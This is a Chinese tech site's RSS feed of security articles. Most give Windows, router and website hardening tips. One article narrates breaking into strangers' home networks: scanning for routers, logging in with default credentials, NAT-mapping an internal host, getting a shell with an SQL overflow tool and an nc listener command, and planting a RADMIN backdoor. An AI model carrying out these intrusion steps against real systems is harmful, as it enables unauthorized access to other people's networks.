<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="inc/rss.xsl" version="1.0"?><rss version="2.0">
<channel>
<title>黑客攻防 - 星辰电脑网络技术网 - 计算机服务网络信息中心(CSNIC)</title>
<link><![CDATA[http://csnic.net/]]></link>
<description><![CDATA[星辰电脑网络技术资讯网-计算机服务网络信息中心(CSNIC),力争打造最具专业的电脑网络技术服务品牌；我们的口号是：为中国计算机服务提供动力!]]></description>
<language>zh-CN</language><generator>iwms.net</generator>
<image>
<title><![CDATA[星辰电脑网络技术网 - 计算机服务网络信息中心(CSNIC)]]></title>
<url>pic/logo.gif</url>
<link>http://csnic.net/</link>
</image>
<item>
	<title><![CDATA[网站站长必读：十点技巧保障您的网站安全]]></title>
	<link><![CDATA[http://www.csnic.net:81/n1118c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Mon, 24 Mar 2008 02:03:03 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P><SPAN id=zoom>　　香港娱乐圈“艳照门”事件沸沸扬扬，究其原因无关道德，实在是电脑不安全，照片和录象被泄密了。</SPAN> 
<P><SPAN id=zoom>　　只要掌握了信息安全技术，才不会担心你的信息的丢失，不担心你上网会被盗窃银行密码和QQ密码邮箱密码，我们才不会出现陈冠希一样的尴尬。 </SPAN>
<P><SPAN id=zoom>　　春节前后，网上炒的最沸腾的就是“艳照门”了，这在信息安全这个小小的圈子里也一个不大不小的热点。一时间众说纷纭，社交工程、信息销毁、道德法律等字眼都进入眼帘。 </SPAN>
<P><SPAN id=zoom>　　我就想不到那么复杂的东东，我觉得就是两个小的细节没有做好。 </SPAN>
<P><SPAN id=zoom>　　1.送修前没有将硬盘卸除或者彻底销毁关键数据：由于种种的不方便，似乎很少人这么做。 </SPAN>
<P><SPAN id=zoom>　　2.没有在维修时进行全程维修陪同监控：由于没有这方面的意识，似乎很少人这么做。 </SPAN>
<P><SPAN id=zoom>　　如果这两个小动作做了，那么就可以避免此次安全事件的发生。 </SPAN>
<P><SPAN id=zoom>　　对于网站的站长来说，安全应该怎么做呢？ </SPAN>
<P><SPAN id=zoom>　　目前很多人都采用动网、LEADBBS、动易系统等程序做网站，由于源码公开，因此程序漏洞暴露明显，很容易被黑，安全专家陈十三哥建议大家参考以下部分安全建议，做好自身安全： </SPAN>
<P><SPAN id=zoom>　　(1)仔细查看安装说明，切记修改默认数据库名，并且一定要把扩展名改为asp或者asa，因为不经处理的数据库可以直接下载，根本无安全可言，另外可以把数据库所在目录改名。 </SPAN>
<P><SPAN id=zoom>　　(2)尽量不采用无组件上传，使用其他组件上传方式（比如Fileup或LyfUpload），部分无组件上传带有严重漏洞，一般可通过修改upfile.asp文件选择上传方式。 </SPAN>
<P><SPAN id=zoom>　　(3)经常访问相关官方网站，关注程序安全漏洞和更新版本，及时给自己程序升级或打上补丁。 </SPAN>
<P><SPAN id=zoom>　　(4)尽量不采用修改版和插件版的程序，因为修改后的程序会使漏洞更多，而且补丁也不一定完全适用。 </SPAN>
<P><SPAN id=zoom>　　(5)设置相对复杂的FTP密码和网站管理密码并经常修改，同时考虑修改网站后台管理的文件名称。 </SPAN>
<P><SPAN id=zoom>　　(6)经常检查网站内文件，发现可疑文件后及时处理，并分析可能的原因。 </SPAN>
<P><SPAN id=zoom>　　(7)对于SQL数据库，您可以用企业管理器连接，然后把重要数据表设置为只读权限，如动网的DV_Admin表修改为只读以后，可以防止任何方式添加管理员。 </SPAN>
<P><SPAN id=zoom>　　(8)二次开发时切记做好对特殊符号的过虑，防止注入漏洞。 </SPAN>
<P><SPAN id=zoom>　　(9)经常备份自己的网站数据，因为网站安全的第一要求就是备份，防止被黑以后数据丢失。 </SPAN>
<P><SPAN id=zoom>　　(10)如果有服务器管理权限建议把论坛上传图片目录设置权限最低。 </SPAN>
<P><SPAN id=zoom>　　在网络攻击成倍增长的今天，网络反黑客保安全已经成为每个计算机用户的必备课程。欲成为成功的信息安全专业人士，不仅需要不断更新最尖端的安全知识，还需要对商务过程和风险管理有深刻认识。就现在许多IT公司的现状来看，基本上每一个公司都有一名或多名（部门）专职的人员负责着公司内网、外网、服务器的网络安全维护。而随着网络应用的不断普及与信息安全服务需求市场的不断成熟，逐渐出现了一些专业的以信息安全服务为主要业务的团队、公司。 </SPAN>
<P><SPAN id=zoom>　　大多数公司的网管仅仅是程序人员和网页设计人员，对安全涉猎有限。而且，网络是否安全，有时并不是网络所有者自己完全清楚的。所以，许多公司要请第三方评估机构或专家来完成对网络安全的评估。这样做的好处是：能对自己所处的环境有个更加清醒的认识，把未来可能的风险降到最小。目前网络安全评估的中介机构，国外已经开始将网络的安全评估作为一个新的服务项目向社会推出。作为一种新兴的业务，其影响是否能象会计师事务所、审计师事务所之类的中介机构那样重要，尚需拭目以待。但有一点可以肯定，那就是网络上的商机同样也与风险同存。要想获得利润，就必须将安全问题解决。</SPAN></P>]]></description>
</item>
<item>
	<title><![CDATA[宽带用户防范 黑客恶意攻击的十大招式]]></title>
	<link><![CDATA[http://www.csnic.net:81/n562c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:09:40 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>随着黑客工具的简单化和傻瓜化，众多的技术水平不高的用户也可以利用手中的黑客工具大肆进行攻击(这些人又被称为“灰客”)，我们的上网安全受到了极大的威胁，难道我们只能被迫挨打，任其欺负吗?当然不是，只要设置得好，这些人是奈何不了我们的!请看本文讲述的十种方法。 
<P><STRONG>一、隐藏IP地址<BR></STRONG>&nbsp;<BR>　　黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。<BR>&nbsp;<BR>　　与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。 </P>
<P><STRONG>二、关闭不必要的端口</STRONG> </P>
<P>　　黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序，该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。<BR>&nbsp;<BR><STRONG>三、更换管理员帐户</STRONG> </P>
<P>　　Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。<BR>&nbsp;<BR>　　首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。 </P>
<P><STRONG>四、杜绝Guest帐户的入侵</STRONG><BR>&nbsp;<BR>　　Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。<BR>&nbsp;<BR>　　禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了<BR>。 <BR><STRONG>五、封死黑客的"后门"</STRONG> </P>
<P>　　俗话说“无风不起浪”，既然黑客能进入，那我们的系统一定存在为他们打开的"后门"，我们只要将此堵死，让黑客无处下手，岂不美哉! </P>
<P>1.删掉不必要的协议 </P>
<P>　　对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NetBIOS是很多安全缺陷的源泉，对于不需要提供文件和打印共享的主机，可以将绑定在TCP/IP协议的NetBIOS给关闭，避免针对NetBIOS的攻击。 </P>
<P>2.关闭“文件和打印共享” </P>
<P>　　文件和打印共享应该是一个非常有用的功能，但在我们不需要它的时候，它也是引发黑客入侵的安全漏洞。所以在没有必要"文件和打印共享"的情况下，我们可以将其关闭。即便确实需要共享，也应该为共享资源设置访问密码。 </P>
<P>3.禁止建立空连接 </P>
<P>　　在默认的情况下，任何用户都可以通过空连接连上服务器，枚举帐号并猜测密码。因此我们必须禁止建立空连接。方法有以下两种:方法一是修改注册表:到注册表 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA下，将DWORD值RestrictAnonymous的键值改为1即可。方法二是修改Windows 2000/XP的本地安全策略为“不允许SAM帐户和共享的匿名枚举”。&nbsp;&nbsp; </P>
<P>4.关闭不必要的服务 </P>
<P>　　服务开得多可以给管理带来方便，但也会给黑客留下可乘之机，因此对于一些确实用不到的服务，最好关掉。比如在不需要远程管理计算机时，我都会将有关远程网络登录的服务关掉。去掉不必要的服务停止之后，不仅能保证系统的安全，同时还可以提高系统运行速度。<BR>&nbsp;<BR><STRONG>六、做好IE的安全设置</STRONG> </P>
<P>　　ActiveX控件和Java Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是:“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与Java相关选项禁用。谨慎些总没有错! </P>
<P>　　另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和Java Applets时有更多的选择，并对本地电脑安全产生更大的影响。 </P>
<P>　　下面是具体的方法:打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到:HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。<BR>&nbsp;<BR><STRONG>七、安装必要的安全软件</STRONG> </P>
<P>　　我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。 </P>
<P><STRONG>八、防范木马程序</STRONG> </P>
<P>　　木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有: </P>
<P>　　● 在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。 <BR>　　● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。 <BR>　　● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。 </P>
<P><STRONG>九、不要回陌生人的邮件</STRONG> </P>
<P>　　有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。 </P>
<P><STRONG>十、及时给系统打补丁</STRONG> </P>
<P>　　最后，建议大家到微软的站点下载自己的操作系统对应的补丁程序，微软不断推出的补丁尽管让人厌烦，但却是我们网络安全的基础。</P>]]></description>
</item>
<item>
	<title><![CDATA[黑客是如何穿透ADSL路由入侵内网？]]></title>
	<link><![CDATA[http://www.csnic.net:81/n561c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:08:16 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>也许看烂了网上已有的常规黑客攻击手段，对一些陈旧的入侵手法早已厌烦，近来我对ADSL MODEM的路由功能产生了浓厚的兴趣，经过一番努力，我终于找到了穿透ADSL路由入侵内网的方法，在这里和各位一起分享我的心得。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　一.扫描 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　现在很多ADSL MODEM都是通过80、23、21三个端口来管理，但80、21端口有很多服务器都有打开，没什么特征性，于是我选择了23端口。打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了。开23的主机还真不少，我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234），好了，一矢中的，现在我就是上帝。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　二.映射 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　入侵已经成功了一半，要进一步入侵内网，我门要进行端口映射，但是我连内网的拓扑都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192.168.1.1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了（但如果使用了dhcp就麻烦了）但是192.168.1.2到底开放了什么端口，我们根本就不知道啊。呵呵，既然不知道，那么我就把他整台主机透明地映射到外网。具体做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192.168.1.2，到此192.168.1.2已经透明地映射到192.168.1.1上，我们访问ADSL MODEM就等于访问主机192.168.1.2了。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　三.检测漏洞 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139、1433等，刚才只是开放了80、23、21而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低啊。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　四.溢出 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　既然没有弱口令，也没开80，那只好从逸出方面着手了，但没开80、21也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　五.募然回首，那人却在，灯火阑珊处 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　看来这个管理员还是比较负责的，该打的补丁都打上了。这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？，心动不如行动，现在只好死马当活马医了，于是： <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　这样就成功得到一个shell了。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　六.设置后门 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道</P>]]></description>
</item>
<item>
	<title><![CDATA[如何找回被盗的QQ密码]]></title>
	<link><![CDATA[http://www.csnic.net:81/n560c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:06:40 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>首先，说明下，最近太多朋友加我QQ，要我帮忙找回QQ密码。我只是QQ中国站［QQCN.<FONT face=Verdana>net</FONT>］的站长，估计QQ中国站这个名字让人家误会，也有朋友说是搜索引擎搜到我的，严重声明：QQ中国站是提供破解和免费的软件下载的站点，和找回QQ密码没有多大关系，希望以下<FONT face=Verdana>如何找回被盗的<FONT color=#800080>QQ</FONT>密码的文章对你有帮助，希望不要再找我了。更不要去找一些所谓收费帮忙找回QQ密码的，通过以下的几种方式，一般是可以自己找回QQ密码的，收费那些人帮你找回用的也是这些办法，大家就不要再浪费钱了，另外希望通过这个文章让没有丢失密码的朋友也提高密码安全意识<FONT face=Verdana>。</FONT></FONT> 
<P>&nbsp;&nbsp; &nbsp;目前QQ木马品种繁多，功能强大，且易学易用，连初学者也会用！正因为这样，QQ木马才那么容易泛滥成灾，现在的网吧，学校机房……30%都可能被人装上了木马，况且大家的防盗意识不高，QQ被盗已是常见事。当QQ被盗了，怎么才可以要回呢？！这是我在网上回答网友N遍的问题了，现在总结一下供大家参考：<BR><BR>&nbsp;&nbsp;&nbsp; 要想要回QQ有必要了解下QQ是怎么被盗的，“小黑客们”&nbsp;常用以下几种盗取QQ：<BR><BR>（1）装木马程序。QQ被盗95%都是中了别人装的木马程序。什么叫木马程序你也不必要理解，就当作是你上QQ时有个东西记录了你的QQ密码，然后通过邮件发送出去告诉别人。<BR><BR>（2）穷举盗号，也就是常说的在线破解。这种方法只对密码简单的用户有效，而且速度不佳，指定盗号的成功率几乎为零，除非盗你QQ那家伙的脑子有点问题，把密码改为：110，119，或在你密码后面加个1，0……等容易猜解的密码。不理解不要紧，你就当作有个人帮你要QQ时不懂密码，随意把数字，字母的所以组合当密码一个个去试到可以登陆为止！<BR><BR>（3）本地破解。当你在一台电脑上过QQ后会留下某些东西在电脑上，而后来者通过些手段把你留下的东西破解出来，这东西或许是你的QQ密码（你登陆QQ时选择保存密码的时候），或许是你的其他资料……<BR><BR>&nbsp;&nbsp; &nbsp;QQ被盗怎么要回QQ密码呢？首先声明，如果你的号码被盗，不是一定能找回的，但也不是绝对没有可能，因为世界上没有绝对的事情。<BR><BR>&nbsp;&nbsp; &nbsp;如果你申请密码保护的话直接去要就可以了，收不到邮件？有可能是网络繁忙，试多几次，等久点；有可能你的邮箱不支持，腾讯的密码邮件发不到。我们着重说下后者情况，很多人见发不到就放弃了。其实不要放弃，密码资料是可以修改的，或许你玩那么久QQ都没有注意到，那么现在得注意了。你可以去这里根据你的密码保护资料修改你的密码保护的邮箱。再去要回你的QQ！</P>]]></description>
</item>
<item>
	<title><![CDATA[将木马拒之门外]]></title>
	<link><![CDATA[http://www.csnic.net:81/n558c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:03:38 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[1、禁止IPC空连接 <BR>　　Cracker可以利用net&nbsp;use命令建立空连接，进而入侵，还有net&nbsp;view，nbtstat这些都是基于空连接的，禁止空连接就好了。打开注册表，找到Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous&nbsp;把这个值改成”1”即可。 <BR><BR>　　2、禁止At命令 <BR><BR>　　Cracker往往给你个木马然后让它运行，这时他就需要at命令了。打开管理工具-服务，禁用task&nbsp;scheduler服务即可。 <BR><BR>　　3、关闭超级终端服务 <BR><BR>　　如果你开了的话，这个漏洞都烂了，我不说了。 <BR><BR>　　4、关闭SSDP&nbsp;Discover&nbsp;Service服务 <BR><BR>　　这个服务主要用于启动家庭网络设备上的UPnP设备，服务同时会启动5000端口。可能造成DDOS攻击，让CPU使用达到100%，从而使计算机崩溃。照理说没人会对个人机器费力去做DDOS，但这个使用过程中也非常的占用带宽，它会不断的向外界发送数据包，影响网络传输速率，所以还是关了好。 <BR><BR>　　5、关闭Remote&nbsp;Registry服务 <BR><BR>　　看看就知道了，允许远程修改注册表?除非你真的脑子进水了。 <BR><BR>　　6、禁用TCP/IP上的NetBIOS <BR><BR>　　网上邻居-属性-本地连接-属性-Internet协议(TCP/IP)属性-高级-WINS面板-NetBIOS设置-禁用TCP/IP上的NetBIOS。这样Cracker就无法用nbtstat命令来读取你的NetBIOS信息和网卡MAC地址了。 <BR><BR>　　7、关闭DCOM服务 <BR><BR>　　这就是135端口了，除了被用做查询服务外，它还可能引起直接的攻击，关闭方法是：在运行里输入dcomcnfg，在弹出的组件服务窗口里选择默认属性标签，取消“在此计算机上启用分布式COM”即可。 <BR><BR>　　8、把共享文件的权限从“everyone”组改成“授权用户” <BR><BR>　　“everyone”&nbsp;在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资料。任何时候都不要把共享文件的用户设置成“everyone”组。包括打印共享，默认的属性就是“everyone”组的，一定不要忘了改。 <BR><BR>　　9、取消其他不必要的服务 <BR><BR>　　请根据自己需要自行决定，下面给出HTTP/FTP服务器需要最少的服务作为参考： <BR><BR>　　l&nbsp;Event&nbsp;Log <BR><BR>　　l&nbsp;License&nbsp;Logging&nbsp;Service <BR><BR>　　l&nbsp;Windows&nbsp;NTLM&nbsp;Security&nbsp;Support&nbsp;Provider <BR><BR>　　l&nbsp;Remote&nbsp;Procedure&nbsp;Call&nbsp;(RPC)&nbsp;Service <BR><BR>　　l&nbsp;Windows&nbsp;NT&nbsp;Server&nbsp;or&nbsp;Windows&nbsp;NT&nbsp;Workstation <BR><BR>　　l&nbsp;IIS&nbsp;Admin&nbsp;Service <BR><BR>　　l&nbsp;MSDTC <BR><BR>　　l&nbsp;World&nbsp;Wide&nbsp;Web&nbsp;Publishing&nbsp;Service <BR><BR>　　l&nbsp;Protected&nbsp;Storage <BR>&nbsp; <BR>10、更改TTL值&nbsp; <BR>&nbsp; <BR><BR>　　Cracker可以根据ping回的TTL值来大致判断你的操作系统，如： <BR><BR>　　TTL=107(WINNT); <BR><BR>　　TTL=108(win2000); <BR><BR>　　TTL=127或128(win9x); <BR><BR>　　TTL=240或241(linux); <BR><BR>　　TTL=252(solaris); <BR><BR>　　TTL=240(Irix); <BR><BR>　　实际上你可以自己更改的： <BR><BR>　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ <BR><BR>　　Parameters：DefaultTTL&nbsp;REG_DWORD&nbsp;0-0xff(0-255&nbsp;十进制,默认值128)改成一个莫名其妙的数字如258，起码让那些小菜鸟晕上半天，就此放弃入侵你也不一定哦。 <BR><BR>　　11、账户安全 <BR><BR>　　首先禁止一切账户，除了你自己，呵呵。然后把Administrator改名。我呢就顺手又建了个Administrator账户，不过是什么权限都没有的那种，然后打开记事本，一阵乱敲，复制，粘贴到“密码”里去，呵呵，来破密码吧!破完了才发现是个低级账户，看你崩溃不? <BR><BR>　　12、取消显示最后登录用户 <BR><BR>　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Current&nbsp;Version\Winlogon：DontDisplayLastUserName把值改为1。 <BR><BR>　　13、删除默认共享 <BR><BR>　　有人问过我一开机就共享所有盘，改回来以后，重启又变成了共享是怎么回事，这是2K为管理而设置的默认共享，必须通过修改注册表的方式取消它： <BR><BR>　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ <BR><BR>　　Parameters：AutoShareServer类型是REG_DWORD把值改为0即可。 <BR><BR>　　14、禁用LanManager&nbsp;身份验证 <BR><BR>　　Windows&nbsp;NT&nbsp;Servers&nbsp;Service&nbsp;Pack&nbsp;4&nbsp;和后续的版本都支持三种不同的身份验证方法：&nbsp;LanManager&nbsp;(LM)&nbsp;身份验证;Windows&nbsp;NT(也叫NTLM)身份验证;Windows&nbsp;NT&nbsp;Version&nbsp;2.0&nbsp;(也叫NTLM2)&nbsp;身份验证; <BR><BR>　　默认的情况下，当一个客户尝试连接一台同时支持LM&nbsp;和&nbsp;NTLM&nbsp;身份验证方法的服务器时，LM&nbsp;身份验证会优先被使用。所以建议禁止LM&nbsp;身份验证方法。 <BR><BR>　　1.&nbsp;打开注册表编辑器; <BR><BR>　　2.&nbsp;定位到&nbsp;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa; <BR><BR>　　3.&nbsp;选择菜单“编辑”，“添加数值”; <BR><BR>　　4.&nbsp;数值名称中输入：LMCompatibilityLevel&nbsp;，数值类型为：DWORD，单击&nbsp;确定; <BR><BR>　　5.&nbsp;双击新建的数据，并根据具体情况设置以下值： <BR><BR>　　0&nbsp;-&nbsp;发送&nbsp;LM&nbsp;和&nbsp;NTLM响应; <BR><BR>　　1&nbsp;-&nbsp;发送&nbsp;LM&nbsp;和&nbsp;NTLM响应; <BR><BR>　　2&nbsp;-&nbsp;仅发送&nbsp;NTLM响应; <BR><BR>　　3&nbsp;-&nbsp;仅发送&nbsp;NTLMv2响应;(Windows&nbsp;2000有效) <BR><BR>　　4&nbsp;-&nbsp;仅发送&nbsp;NTLMv2响应，拒绝&nbsp;LM;(Windows&nbsp;2000有效) <BR><BR>　　5&nbsp;-&nbsp;仅发送&nbsp;NTLMv2响应，拒绝&nbsp;LM&nbsp;和&nbsp;NTLM;(Windows&nbsp;2000有效) <BR><BR>　　6.&nbsp;关闭注册表编辑器; <BR><BR>　　7.&nbsp;重新启动机器。]]></description>
</item>
<item>
	<title><![CDATA[ADSL防御黑客攻击的十大方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n557c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:03:14 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>目前，使用ADSL的用户越来越多，由于ADSL用户在线时间长、速度快，因此成为&nbsp;黑客&nbsp;们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”，要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢？不妨看看以下方法。&nbsp;&nbsp;&nbsp; <BR><BR>一、取消文件夹隐藏共享&nbsp;&nbsp;&nbsp; <BR><BR>如果你使用了Windows&nbsp;2000/XP系统，右键单击C盘或者其他盘，选择"共享"，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？&nbsp;&nbsp;&nbsp; <BR><BR>原来，在默认状态下，Windows&nbsp;2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“\\计算机名或者IP\C$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。&nbsp;&nbsp;&nbsp; <BR><BR>怎么来消除默认共享呢？方法很简单，打开&nbsp;注册表&nbsp;编辑器，进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Sevices\Lanmanworkstation\&nbsp;&nbsp;&nbsp; <BR>parameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。&nbsp;&nbsp;&nbsp; <BR><BR>二、拒绝&nbsp;恶意代码&nbsp;&nbsp;&nbsp; <BR><BR>恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。&nbsp;&nbsp;&nbsp; <BR><BR>一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。&nbsp;&nbsp;&nbsp; <BR><BR>运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。&nbsp;&nbsp;&nbsp; <BR><BR>三、封死黑客的“后门”&nbsp;&nbsp;&nbsp; <BR><BR>俗话说“无风不起浪”，既然黑客能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让黑客无处下手，便无后顾之忧！&nbsp;&nbsp;&nbsp; <BR><BR>1.删掉不必要的协议&nbsp;&nbsp;&nbsp; 